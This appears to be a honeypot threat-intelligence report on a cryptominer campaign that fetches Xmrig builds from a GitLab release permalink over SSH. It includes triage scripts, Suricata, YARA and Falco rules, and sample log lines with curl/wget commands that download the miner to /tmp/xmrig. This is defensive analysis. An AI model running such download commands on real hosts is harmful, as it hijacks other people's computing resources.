Published 2026-06-24 · Source: distributed honeypot fleet · Confidence: HIGH
Over a 30-day window, sensors observed an attacker using GitLab's release CDN as a malware
distribution channel for Xmrig cryptominer binaries. The attacker (34.67.58.31,
a cloud-hosting provider IP) downloads multi-arch Xmrig static builds from
gitlab.com/Kanedias/xmrig-static — a public GitLab repository that maintains
pre-compiled Xmrig binaries. By using the /permalink/latest/ URL path, the attacker
always receives the newest build without hardcoding version numbers or maintaining their own
distribution infrastructure.
This pattern represents an emerging class of supply-chain-adjacent threats in which attackers
use a legitimate software distribution platform as their own hosting. IP and domain
blocklists cannot block gitlab.com without disrupting legitimate development workflows, and
because the binaries are authentic Xmrig builds that the upstream repository re-publishes
weekly, file hashes go stale with every release. Detection therefore has to key on the
download pattern and the miner's runtime behaviour rather than on file hashes.
| Attribute | Assessment |
|---|---|
| Attacker IP | 34.67.58.31 — cloud-hosting provider |
| Distribution channel | GitLab Releases CDN (gitlab.com) |
| Repository | Kanedias/xmrig-static — public Xmrig static-builds repo |
| URL pattern | /permalink/latest/downloads/xmrig-<arch>-static |
| Intent | Cryptomining (Xmrig deployment via SSH access) |
| Sophistication | Medium — leverages legitimate infrastructure to evade blocklists |
| Cadence | Weekly, ~09:40 UTC (3 waves: Jun 10, Jun 17, Jun 24) |
| First observed | 2026-06-10 |
| Last observed | 2026-06-24 (active) |
┌──────────────────────────────────────────────────────────────────┐
│ GitLab CDN as malware distribution channel │
└──────────────────────────────────────────────────────────────────┘
Attacker 34.67.58.31 (cloud-hosting)
│
│ SSH into target → execute download command
│
▼
gitlab.com/Kanedias/xmrig-static/-/releases/permalink/latest/downloads/
│
├── xmrig-x86_64-static (9.8 MB) → /tmp/xmrig
├── xmrig-i686-static (10.9 MB) → /tmp/xmrig
├── xmrig-aarch64-static (8.8 MB) → /tmp/xmrig
└── xmrig-armv7-static (6.1 MB) → /tmp/xmrig
Why this matters:
• gitlab.com cannot be blocklisted without impacting development workflows
• /permalink/latest/ → always gets newest build, no version pinning
• Binaries are authentic Xmrig builds, not modified, and upstream publishes a new build weekly, so hashes rotate weekly and hash-based detection is always one release behind
• Weekly cadence at a fixed time of day from a cloud-hosted source points to scheduled automation (a cron job) rather than hands-on activity
Wave 3 (2026-06-24, most recent):
| SHA256 | Architecture | Size | Artifact |
|---|---|---|---|
| dceaabef812f5600... | ELF 64-bit x86-64 | 9,832,024 B | xmrig-x86_64-static |
| 8a4c02ac5b951196... | ELF 32-bit i386 | 10,944,948 B | xmrig-i686-static |
| 4868c7dce2245d3a... | ELF 64-bit AArch64 | 8,836,112 B | xmrig-aarch64-static |
| 3d9ae2e3cadbba2b... | ELF 32-bit ARMv7 | 6,086,388 B | xmrig-armv7-static |
Wave 2 (2026-06-17):
| SHA256 | Architecture | Size |
|---|---|---|
| 1a0b0bb859fe6686... | ELF 64-bit x86-64 | 9,832,024 B |
| 45ab548ec8a93f49... | ELF 32-bit i386 | 10,944,948 B |
| 1eb849549df06ff4... | ELF 64-bit AArch64 | 8,836,112 B |
| ca90747aec191150... | ELF 32-bit ARMv7 | 6,086,388 B |
Wave 1 (2026-06-10):
| SHA256 | Architecture | Size |
|---|---|---|
| c3cedc9a4d761e9a... | ELF 64-bit x86-64 | 9,832,024 B |
| 4e261d31521afdc0... | ELF 32-bit i386 | 10,940,852 B |
| 69b36a4cd1a95119... | ELF 64-bit AArch64 | 8,836,112 B |
| 60847567bce85f20... | ELF 32-bit ARMv7 | 6,086,388 B |
Note: The tables are listed newest first. Binary sizes are identical across all three waves
except for the i386 build, which is 10,940,852 B in wave 1 and 10,944,948 B in waves 2 and 3;
the 4 KB difference indicates a build change between those releases. SHA256 hashes differ in
every wave because the repository publishes a new build weekly and /permalink/latest/ resolves
to whichever release is newest at download time.
The most recent wave (2026-06-24) has not yet been submitted to VirusTotal. An earlier wave
sample (ca90747a...) was looked up on 2026-06-23 and returned no VT results, meaning nobody
had submitted that hash yet, which is expected when every release produces fresh hashes; it
says nothing about whether the file is benign. Xmrig is open-source miner software with both
legitimate and malicious uses; where unmodified builds do have verdicts, engines commonly label
them as potentially unwanted coin-miner software rather than as trojans, so a VT lookup is a weak
signal in either direction. The download pattern and the runtime behaviour are the reliable indicators.
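Because the hash changes with every weekly release, the useful file-level check is structural: the ELF class and machine type, a size band around the four observed builds, and the miner strings. The Python below is an added example written for this page, not tooling from the sensor fleet or from the Xmrig or xmrig-static projects. It classifies a blob by its ELF header and reports why a profile match fails. The sample inputs are constructed ELF headers followed by zero filler, not the real builds; the marker strings come from the YARA rule further down this page, while the size band, the e_machine table and the `triage` helper are assumptions made for the example.

```python
"""Hash-independent triage for the static Xmrig builds: classify by ELF header,
size band and marker strings rather than by SHA256, which rotates weekly.
Added example; the blobs built by make_fake_elf are constructed test data."""
import hashlib
import struct

ELF_MAGIC = b"\x7fELF"
# e_machine values (ELF spec) for the four architectures seen in the campaign
MACHINES = {0x03: "i386", 0x28: "armv7", 0x3E: "x86-64", 0xB7: "AArch64"}
# Assumed size band in bytes with slack around the observed 6.1 to 10.9 MB builds
SIZE_MIN, SIZE_MAX = 5_000_000, 12_000_000
# Marker strings taken from the YARA rule on this page
MARKERS = (b"xmrig", b"RANDOMX")


def elf_identity(blob):
    """Return class/endianness/machine/type from the ELF header, or None if not ELF."""
    if len(blob) < 0x14 or blob[:4] != ELF_MAGIC:
        return None
    ei_class, ei_data = blob[4], blob[5]
    endian = "<" if ei_data == 1 else ">"
    # e_type sits at 0x10 and e_machine at 0x12 in both ELF32 and ELF64 headers
    e_type, e_machine = struct.unpack_from(endian + "HH", blob, 0x10)
    return {
        "class": 64 if ei_class == 2 else 32,
        "endian": "little" if ei_data == 1 else "big",
        "machine": MACHINES.get(e_machine, f"unknown(0x{e_machine:02x})"),
        "type": e_type,
    }


def matches_xmrig_static_profile(blob):
    """(matched, reason): every gate is reported so an analyst sees why a file fell out."""
    ident = elf_identity(blob)
    if ident is None:
        return False, "not an ELF file"
    if ident["machine"] not in MACHINES.values():
        return False, f"unexpected e_machine {ident['machine']}"
    if not SIZE_MIN <= len(blob) <= SIZE_MAX:
        return False, f"size {len(blob):,} B outside observed band"
    missing = [m.decode() for m in MARKERS if m not in blob]
    if missing:
        return False, "missing marker strings: " + ", ".join(missing)
    return True, f"ELF {ident['class']}-bit {ident['machine']}, {len(blob):,} B"


def triage(blob, known_hashes):
    """Side-by-side verdict: does the hash match a blocklist, and does the profile match?
    The gap between the two is exactly what weekly re-publication causes."""
    digest = hashlib.sha256(blob).hexdigest()
    matched, reason = matches_xmrig_static_profile(blob)
    return {"sha256": digest, "hash_known": digest in known_hashes,
            "profile_match": matched, "reason": reason}


def make_fake_elf(e_machine, size, is64=True, with_markers=True):
    """Constructed test blob: a valid-looking ELF header, the marker strings, zero filler.
    Not a real sample and not executable."""
    hdr = bytearray(ELF_MAGIC)
    hdr += bytes([2 if is64 else 1, 1, 1, 0]) + bytes(8)  # class, little-endian, version, SysV ABI, pad
    hdr += struct.pack("<HH", 2, e_machine)               # e_type = ET_EXEC, e_machine
    hdr += bytes(0x40 - len(hdr))                         # remaining header fields zeroed
    body = b"\x00".join(MARKERS) if with_markers else b""
    return bytes(hdr) + body + bytes(size - len(hdr) - len(body))


if __name__ == "__main__":
    sample = make_fake_elf(0x3E, 9_832_024)  # size of the observed x86-64 build
    # An empty blocklist stands in for "last week's hashes": none will match this release
    print(triage(sample, known_hashes=set()))
    print(matches_xmrig_static_profile(make_fake_elf(0x03, 400_000, is64=False)))
```

The profile is a triage aid, not proof: any statically linked miner in the same size band with the same strings would match, and a recompiled build can change both. Pair it with the download-URL and process indicators on this page before acting on it.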
The threat is not in the binary itself (Xmrig is well-documented open-source software) but in the distribution method. Using GitLab's release CDN gives the attacker several advantages:
• gitlab.com cannot be blocked without impacting legitimate development
• /permalink/latest/ always fetches the newest build without any change to the attacker's command
• no attacker-owned hosting to stand up, pay for, or lose to takedown
| ID | Technique | Evidence |
|---|---|---|
| T1496 | Resource Hijacking | Xmrig cryptominer deployment for Monero mining |
| T1105 | Ingress Tool Transfer | Downloads from gitlab.com Releases CDN |
| T1071.001 | Web Protocols | HTTPS (port 443) to gitlab.com for the download; no C2 traffic was observed |
| T1584.006 | Compromise Infrastructure: Web Services | Loose fit: the attacker abuses a third party's public release artifacts; neither GitLab nor the repository was compromised |
| T1021.004 | Remote Services: SSH | Download commands issued inside authenticated SSH sessions on the honeypots |
| T1059.004 | Command and Scripting Interpreter: Unix Shell | Download command executed post-authentication |
| Date | Event |
|---|---|
| 2026-06-10 ~09:36 UTC | Wave 1: 4 multi-arch samples downloaded from GitLab. First observation of this campaign. |
| 2026-06-17 ~09:40 UTC | Wave 2: 4 samples with updated hashes (new weekly build published). Identical sizes. |
| 2026-06-24 ~09:43 UTC | Wave 3: 4 samples with updated hashes again. Campaign continues weekly cadence. |
The ~09:40 UTC start time of all three waves and the exact 7-day spacing (Jun 10 → 17 → 24) are consistent with a scheduled job (cron) on the attacker's host; the few minutes of drift between waves (09:36, 09:40, 09:43) is small enough not to argue against that.
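The URL pattern in the attribute table and the timing argument in this timeline can both be checked mechanically. The following Python is an added example written for this page, not tooling from the sensor fleet or from the report's authors: it scans constructed honeypot records for GitLab release-permalink downloads, extracts repository, artifact and architecture, then collapses per-architecture fetches into waves per source and tests whether the inter-wave spacing and time of day look scheduled. The curl/wget command wording, the thresholds (7 days plus or minus 1, a 30-minute time-of-day window, a one-hour gap between waves) and the two unrelated sources are assumptions made for the example; the timestamps follow the timeline above.

```python
"""Triage SSH-honeypot command logs for GitLab release-permalink downloads and
test whether a source shows the weekly cadence described in this report.
Added example; not the sensor fleet's own tooling."""
import re
from collections import defaultdict
from datetime import datetime

# URL shape from the report: /<group>/<repo>/-/releases/permalink/latest/downloads/<artifact>
PERMALINK_RE = re.compile(
    r"https?://gitlab\.com/(?P<repo>[A-Za-z0-9_.-]+/[A-Za-z0-9_.-]+)"
    r"/-/releases/permalink/latest/downloads/(?P<artifact>[A-Za-z0-9_.-]+)"
)
# Artifact naming used by the repository in the report: xmrig-<arch>-static
ARTIFACT_RE = re.compile(r"^xmrig-(?P<arch>[A-Za-z0-9_]+)-static$")

# Constructed sample of post-authentication commands: (timestamp, source IP, command).
# Command wording is assumed (the report gives only URLs); unrelated sources use
# RFC 5737 documentation addresses.
SESSIONS = [
    ("2026-06-10T09:36:12Z", "34.67.58.31",
     "curl -fsSL -o /tmp/xmrig https://gitlab.com/Kanedias/xmrig-static/-/releases/permalink/latest/downloads/xmrig-x86_64-static"),
    ("2026-06-10T09:36:15Z", "34.67.58.31",
     "wget -q -O /tmp/xmrig https://gitlab.com/Kanedias/xmrig-static/-/releases/permalink/latest/downloads/xmrig-aarch64-static"),
    ("2026-06-17T09:40:03Z", "34.67.58.31",
     "curl -fsSL -o /tmp/xmrig https://gitlab.com/Kanedias/xmrig-static/-/releases/permalink/latest/downloads/xmrig-x86_64-static"),
    ("2026-06-24T09:43:41Z", "34.67.58.31",
     "curl -fsSL -o /tmp/xmrig https://gitlab.com/Kanedias/xmrig-static/-/releases/permalink/latest/downloads/xmrig-armv7-static"),
    ("2026-06-12T14:02:00Z", "203.0.113.7",
     "curl -fsSL -o /tmp/t https://gitlab.com/example/tool/-/releases/permalink/latest/downloads/tool-linux-amd64"),
    ("2026-06-13T02:11:09Z", "198.51.100.9", "uname -a; grep -c processor /proc/cpuinfo"),
]


def extract_downloads(sessions):
    """One record per GitLab release-permalink URL found in the captured commands."""
    hits = []
    for ts, src_ip, cmd in sessions:
        for m in PERMALINK_RE.finditer(cmd):
            art = ARTIFACT_RE.match(m["artifact"])
            hits.append({
                "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
                "src_ip": src_ip,
                "repo": m["repo"],
                "artifact": m["artifact"],
                "arch": art["arch"] if art else None,  # None when the naming scheme differs
            })
    return hits


def cadence(hits, period_days=7, jitter_days=1.0, tod_window_min=30, wave_gap_s=3600):
    """Per (src_ip, repo): wave count, day spacing between waves, time-of-day spread.
    'scheduled' is set when there are at least three waves, every spacing is within
    jitter_days of period_days, and all waves start inside a tod_window_min window."""
    by_key = defaultdict(list)
    for h in hits:
        by_key[(h["src_ip"], h["repo"])].append(h["ts"])
    report = {}
    for key, stamps in by_key.items():
        stamps.sort()
        waves = []  # fetches of several architectures within wave_gap_s count as one wave
        for t in stamps:
            if not waves or (t - waves[-1]).total_seconds() > wave_gap_s:
                waves.append(t)
        intervals = [(b - a).total_seconds() / 86400 for a, b in zip(waves, waves[1:])]
        tod = [w.hour * 60 + w.minute for w in waves]
        spread = max(tod) - min(tod)
        scheduled = (
            len(waves) >= 3
            and all(abs(i - period_days) <= jitter_days for i in intervals)
            and spread <= tod_window_min
        )
        report[key] = {
            "waves": len(waves),
            "intervals_days": [round(i, 2) for i in intervals],
            "tod_spread_min": spread,
            "scheduled": scheduled,
        }
    return report


if __name__ == "__main__":
    found = extract_downloads(SESSIONS)
    for h in found:
        print(h["ts"], h["src_ip"], h["repo"], h["artifact"], h["arch"])
    for key, r in cadence(found).items():
        print(key, r)
```

For Cowrie JSON logs the same three inputs are the `timestamp`, `src_ip` and `input` fields of `cowrie.command.input` events. The `scheduled` flag is a heuristic for prioritising sources, not attribution: a human who returns at the same hour each week would trip it too.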
# Without TLS decryption only the SNI is visible; this fires on every gitlab.com session from $HOME_NET, so correlate it with the SSH session rather than block on it.
alert tls $HOME_NET any -> $EXTERNAL_NET 443 ( msg:"cowrAI gitlab.com TLS session from monitored host (correlate with SSH activity)"; flow:to_server,established; tls.sni; content:"gitlab.com"; endswith; classtype:policy-violation; sid:9003030001; rev:2; )
# With TLS terminated at a proxy (http protocol) the release-permalink path is visible and the match is specific.
alert http $HOME_NET any -> $EXTERNAL_NET any ( msg:"cowrAI GitLab CDN Xmrig static-build download"; flow:to_server,established; http.host; content:"gitlab.com"; http.uri; content:"/Kanedias/xmrig-static/"; content:"/releases/permalink/latest/downloads/xmrig-"; distance:0; content:"-static"; distance:0; classtype:trojan-activity; sid:9003030002; rev:1; )
rule Xmrig_Static_Build_From_GitLab {
    meta:
        description = "Xmrig static build distributed via GitLab CDN"
        author = "cowrAI"
        date = "2026-06-24"
        reference = "gitlab.com/Kanedias/xmrig-static"
    strings:
        $xmrig1 = "xmrig" ascii nocase
        $xmrig2 = "Donate to support the project" ascii
        $xmrig3 = "RANDOMX" ascii
        $build1 = "Kanedias/xmrig-static" ascii
    condition:
        // a file that names the repository (for example a dropper script) ...
        $build1 or
        // ... or an ELF in the size band of the four observed builds carrying the miner strings
        (uint32(0) == 0x464C457F and filesize > 4MB and filesize < 16MB and
         $xmrig1 and $xmrig2 and $xmrig3)
}
- rule: Xmrig Process Running
  desc: Detect an xmrig process started on the host after the GitLab CDN download
  # spawned_process is a macro from the default Falco ruleset
  condition: >
    spawned_process and
    (proc.name in ("xmrig", "xmrigMiner", ".real_mnd") or
     proc.cmdline contains "xmrig" or
     proc.cmdline contains "-c /tmp/xc")
  output: "Xmrig miner detected (user=%user.name pid=%proc.pid name=%proc.name cmdline=%proc.cmdline parent=%proc.pname)"
  priority: WARNING
  tags: [cryptomining, T1496]
Data collected by a distributed honeypot fleet running SSH protocol lures. Post-authentication commands were captured at the application layer, including the URLs used to download malware binaries. Downloaded files were automatically hashed and archived for analysis. The GitLab distribution pattern was identified by correlating download URLs across multiple sensors and confirming the weekly cadence.